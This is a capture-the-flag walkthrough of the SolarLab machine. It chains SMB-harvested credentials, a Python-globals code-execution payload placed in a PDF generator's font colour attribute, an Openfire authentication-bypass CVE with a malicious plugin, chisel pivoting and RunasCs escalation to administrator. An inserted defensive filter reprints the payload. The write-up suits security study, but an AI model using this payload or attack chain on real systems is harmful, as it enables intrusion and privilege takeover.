Hello hackers, today I wanted to share a simple writeup of one of the Season 5 machines. Actually, Season 5 is very sweet so far, because this time I am getting better at Windows machines, especially AD, and at some of the most difficult Linux machines.

Description:

SolarLab is a medium Windows machine from Season 5 by LazyTitan23, where we were required to hack it and get access as administrator. What I love about this box is that it reuses one of the exploits I did on a machine we hacked during Season 4 (Savage Lands); if I'm not mistaken, the box was Jab.

Let the hack begin.

SCANNING

I started by scanning the whole network with nmap.

ENUMERATION

I ran nmap against all ports, because I didn't want to risk skipping anything, and waited for the full port scan to finish.

Then I decided to enumerate one port after another.

ENUMERATING PORT 80

PORT     STATE SERVICE       REASON  VERSION
80/tcp   open  http          syn-ack nginx 1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
|_http-server-header: nginx/1.24.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

On port 80 we can see a hostname in the redirect and also the http-server-header; what mattered most to me was the domain name. So I decided to add it to my hosts file and browse to it.

I didn't get much info, so I decided to brute-force directories and subdomains at the same time and see what I would get.

Sadly I only ended up with one subdomain, report.solarlab.htb; I didn't find any directory that was useful.

ENUMERATING SMB

Since I saw an SMB port open, I decided to enumerate it too, hoping to get some useful info.

┌──(alienx㉿alienX)-[~/Desktop/MACHINES/SOLARLAB]
└─$ smbclient -L 10.10.11.16 
Password for [WORKGROUP\alienx]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Documents       Disk      
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.16 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

From this we can see that the other shares need a password, but the one we could access anonymously was the 'Documents' share.

I decided to download a few of the documents and see if any were useful to me.

The document that gave me some juicy info was the 'details-file.xlsx' file.

Password for [WORKGROUP\alienx]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri May 17 05:02:39 2024
  ..                                 DR        0  Fri May 17 05:02:39 2024
  concepts                            D        0  Fri Apr 26 10:41:57 2024
  desktop.ini                       AHS      278  Fri Nov 17 05:54:43 2023
  details-file.xlsx                   A    12793  Fri Nov 17 07:27:21 2023
  LPUJYTWMSH                          D        0  Fri May 17 05:02:39 2024
  My Music                        DHSrn        0  Thu Nov 16 14:36:51 2023
  My Pictures                     DHSrn        0  Thu Nov 16 14:36:51 2023
  My Videos                       DHSrn        0  Thu Nov 16 14:36:51 2023
  old_leave_request_form.docx         A    37194  Fri Nov 17 05:35:57 2023

                7779839 blocks of size 4096. 1844829 blocks available
smb: \> mget details-file.xlsx
Get file details-file.xlsx? yes
getting file \details-file.xlsx of size 12793 as details-file.xlsx (21.0 KiloBytes/sec) (average 21.0 KiloBytes/sec)
smb: \> exit

From the spreadsheet we get some info such as usernames, passwords and emails (let's record them somewhere and continue with our enumeration). I decided to focus on the usernames and passwords first.

## from Documents
users & their pass
1. blake.byte (ThisCanB3typedeasily1@)
2. AlexanderK (danenacia9234n)
3. ClaudiaS (dadsfawe9dafkn)

I wasn't done with SMB LOL, so I went back and tried crackmapexec. crackmapexec is a nice enumeration tool; instead of smbclient we can also use it to do all of that.

I checked for users but got nothing, so I decided to brute-force RIDs instead.

crackmapexec smb 10.10.11.16 -u 'user' -p 'PASS' --rid-brute
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab\user:PASS 
SMB         10.10.11.16     445    SOLARLAB         [+] Brute forcing RIDs
SMB         10.10.11.16     445    SOLARLAB         500: SOLARLAB\Administrator (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         501: SOLARLAB\Guest (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         503: SOLARLAB\DefaultAccount (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         504: SOLARLAB\WDAGUtilityAccount (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         513: SOLARLAB\None (SidTypeGroup)
SMB         10.10.11.16     445    SOLARLAB         1000: SOLARLAB\blake (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         1001: SOLARLAB\openfire (SidTypeUser)

N/B: After analyzing my data I connected some dots. From smbclient I got a spreadsheet with some usernames, one of them being 'blake', and now after using crackmapexec I get the same user, so we need to find somewhere we can log in with this user. My next guess came from the 'openfire' user in the crackmapexec output: once you see a user named openfire, you should expect an Openfire service listening internally on port 9090 or 9091, which you will have to reach by pivoting from inside the machine, and which may well be vulnerable.

So the openfire user gave me a clue that once I got access inside the machine, my next step would be pivoting (that was my general overview once I saw this user). Now let's see how this goes.

ENUMERATING PORT 6791

6791/tcp open  http          syn-ack nginx 1.24.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
|_http-server-header: nginx/1.24.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Here we find a subdomain and a port number. I added this one to my hosts file and decided to give it a try.

url: http://report.solarlab.htb:6791/

[Screenshot: Login - ReportHub]

Now we have a ReportHub interface, but we need valid credentials to log in.

I tried the creds from the spreadsheet but they didn't work, so I decided to try harder and make a small twist on the username, using "blakeb" instead of "blake".

Creds

1. blake.byte (ThisCanB3typedeasily1@)

username: blakeb
password: ThisCanB3typedeasily1@

Now we can log in.

[Screenshot: Dashboard - ReportHub]

ReportHub is used to generate a PDF file, by either uploading an image or even an HTML file.

A little Google search about ReportHub vulnerabilities led me to this CVE PoC on GitHub.

After analyzing each endpoint with Burp I found that we have two endpoints which can get us to the same goal, which was RCE.

With 'leaverequest' there is a file upload vulnerability, but I will go with a simpler method here: the endpoint that was easily exploitable was 'travelRequest'.

After checking the Burp Suite history I sent this request to Repeater.

At the bottom of the CVE page above there is a PoC; I decided to edit it and use it.

The PoC says we can create a malicious file.html and put our malicious HTML code inside, which will try to exploit the Python library. So instead of creating a file to upload, I am going to put my PowerShell payload straight into the request; no time to upload.

payload:

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('payload here') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
    exploit
</font></para>
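As an added defensive example (not part of this writeup, of ReportHub or of the PoC), here is a pre-filter that rejects markup like the payload above before it reaches the PDF library: it allowlists what a colour or size attribute may look like, flags attribute values carrying Python expression tokens, and fails closed on tags it cannot parse. It assumes ReportLab-style <para>/<font> markup (my identification of the Python library; the page does not name it) and the attribute names listed in the code.

```python
import re

# Constructed samples. The first is the PoC shape shown on this page (the command is left
# as the page's "payload here" placeholder); the second is ordinary, harmless markup.
MALICIOUS_MARKUP = r"""<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('payload here')
for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0,
'__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) },
'__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))]
for none in [[].append(1)]]] and 'red'">exploit</font></para>"""
BENIGN_MARKUP = '<para><font color="#ff0000" size="12">Leave request approved</font></para>'

# Start tag with its attribute text; quoted values may contain < and > without ending the tag.
TAG_RE = re.compile(r"""<([A-Za-z][\w-]*)((?:"[^"]*"|'[^']*'|[^>"'])*)>""")
ATTR_RE = re.compile(r"""([^\s=/>"']+)\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+)""")
# Allowlist: a colour is a name, #rgb/#rrggbb or rgb(r,g,b); a size is a plain number.
COLOR_RE = re.compile(r"#[0-9a-fA-F]{3}(?:[0-9a-fA-F]{3})?|[A-Za-z]+|rgb\(\s*\d{1,3}(?:\s*,\s*\d{1,3}){2}\s*\)")
NUMBER_RE = re.compile(r"-?\d+(?:\.\d+)?")
# Tokens a presentation attribute never needs but the PoC cannot do without.
SUSPECT_RE = re.compile(r"__\w+__|\bgetattr\b|\bsetattr\b|\blambda\b|\btype\(|\.system\(|\bfor\b.*\bin\b", re.S)
# Attribute names are an assumption; extend them to whatever markup your generator accepts.
COLOR_ATTRS = {"color", "fontcolor", "textcolor", "backcolor", "bgcolor"}
NUMERIC_ATTRS = {"size", "fontsize", "leading", "rise"}


def audit_markup(markup: str) -> list[str]:
    """Return a finding per attribute value that fails the allowlist or carries expression
    tokens; an empty list means the markup may go to the PDF generator. A pre-filter only:
    the library itself still has to be patched."""
    findings, parsed_tags = [], 0
    for tag_match in TAG_RE.finditer(markup):
        parsed_tags += 1
        tag = tag_match.group(1).lower()
        for name, raw in ATTR_RE.findall(tag_match.group(2)):
            name = name.lower()
            if raw[0] not in "\"'":
                findings.append(f"<{tag} {name}>: unquoted attribute value rejected")
                continue
            value = raw[1:-1].strip()
            if name in COLOR_ATTRS and not COLOR_RE.fullmatch(value):
                findings.append(f"<{tag} {name}>: not a plain colour literal ({value[:40]!r}...)")
            elif name in NUMERIC_ATTRS and not NUMBER_RE.fullmatch(value):
                findings.append(f"<{tag} {name}>: not a plain number ({value!r})")
            if SUSPECT_RE.search(value):
                findings.append(f"<{tag} {name}>: contains Python expression tokens")
    # Fail closed: a start tag the grammar above could not parse is not silently skipped.
    if parsed_tags != len(re.findall(r"<[A-Za-z]", markup)):
        findings.append("unparseable start tag rejected")
    return findings
```

Calling audit_markup on the page's payload returns two findings for the font colour attribute, while the benign sample returns an empty list.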

EXPLOITATION

EXPLOITING ReportHub

I went and grabbed the base64-encoded PowerShell script and added it to the payload.

Finally my payload looked like this after beautifying it like a noob LOL. There is a simple technique you need to use while encoding, otherwise you won't get a shell (thanks to @blackninja23, who took the time back then to teach me this and made sure I understood this method of encoding a PowerShell script, because I had been struggling with it for a long time); just do a simple Google search.

Now let's get a shell.

In blake's home directory you can grab the user flag.

LATERAL MOVEMENT

For lateral movement I started by checking for interesting users and local groups, but nothing was useful here apart from the openfire user.

The only interesting user here was "openfire". What we were supposed to do was first get a shell as "openfire" using some pivoting technique, and then find a way to get to administrator.

I didn't even want to Google, because I know the Openfire service runs internally on ports 9090 and 9091; I confirmed this with the command below.

PS C:\users\blake\desktop> netstat -ano | findstr "9090"
  TCP    127.0.0.1:9090         0.0.0.0:0              LISTENING       2244
PS C:\users\blake\desktop> netstat -ano | findstr "9091"
  TCP    127.0.0.1:9091         0.0.0.0:0              LISTENING       2244
PS C:\users\blake\desktop> 

I knew right away that in order to access ports 9090 and 9091 I needed to do some port forwarding, and that is where pivoting comes in handy. We can't reach these ports directly because they are listening only on 127.0.0.1, so the only path to them was through the computer I already had access to (blake's).

PIVOTING

Uploading chisel

I am going to use chisel on both my local machine and the target machine.

I decided to get multiple shells, so that if one crashes I can use the others.

I will forward both ports 9090 and 9091 to my local machine.

Let's access these ports and see whether there really is an Openfire service running.

url:http://127.0.0.1:9090/login.jsp?url=%2Findex.jsp

Exploiting Openfire

So far we have the Openfire service reachable from our local machine, and better still, this Openfire version is vulnerable to an authentication bypass which leads to remote code execution: upload a malicious plugin and we get RCE, simple as that. All this I learned in Season 4, from the Jab machine.

Openfire, Version: 4.7.4

Some Google-fu found this CVE-2023-32315 PoC and I decided to clone it.

I ran the exploit to create a valid administrator username and password.

Use the generated credentials to log in to Openfire.

[Screenshot: Openfire Admin Console - Server Information]

N/B: something to note is that the Python PoC script generates a random username and password, but if you understand what the script does inside, you can modify it to generate the username and password of your choice.

Getting a shell as openfire.

First of all we need to upload the plugin from the PoC, which gives us a password we will use to access its console. You may find it difficult, but it is very easy if you have done the Jab machine.

Uploading the plugin

Then I uploaded the plugin; it's a Java plugin because Openfire is written in Java.

After uploading, I was good to go.

The plugin page shows you where to find it (Management Tool) and also gives you the password, i.e. "123".

The easiest way to find the plugin is by clicking Server -> Server Settings -> Management tools.

Now let's find the console: click the plugin's home page and then "system command".

From here I was able to execute commands as openfire.

Getting a reverse shell

Let's get a proper shell, because this environment is limited. As usual I beautified my PowerShell payload and at the same time started the listener on my local machine.

payload:

powershell -e YourPayloadHere

How sweet this machine was; it was really fun and interesting.

PRIVILEGE ESCALATION

Privilege escalation was interesting too. I don't know whether I did it the intended way or not; I will have to find "LazyTitan23" himself and ask him after the machine retires.

Privilege escalation with the RunasCs script

I didn't find much info about the openfire user after reaching this point.

But while I was in "Program Files" looking for any juicy program to exploit, I got the idea of trying the RunasCs script and decided to give it a try.

My idea was this: since I have blake's password, I can use it with the RunasCs script to try to execute commands and see which user the system responds with.

I successfully executed commands as administrator; now let's get a shell as administrator.

Uploading the nc binary

Then listen on port 1234 on my local machine.

C:\Windows\system32>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 385E-AC57

 Directory of c:\Users\Administrator\Desktop

05/03/2024  02:32 PM    <DIR>          .
05/03/2024  02:32 PM    <DIR>          ..
05/17/2024  10:38 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,737,708,544 bytes free

c:\Users\Administrator\Desktop>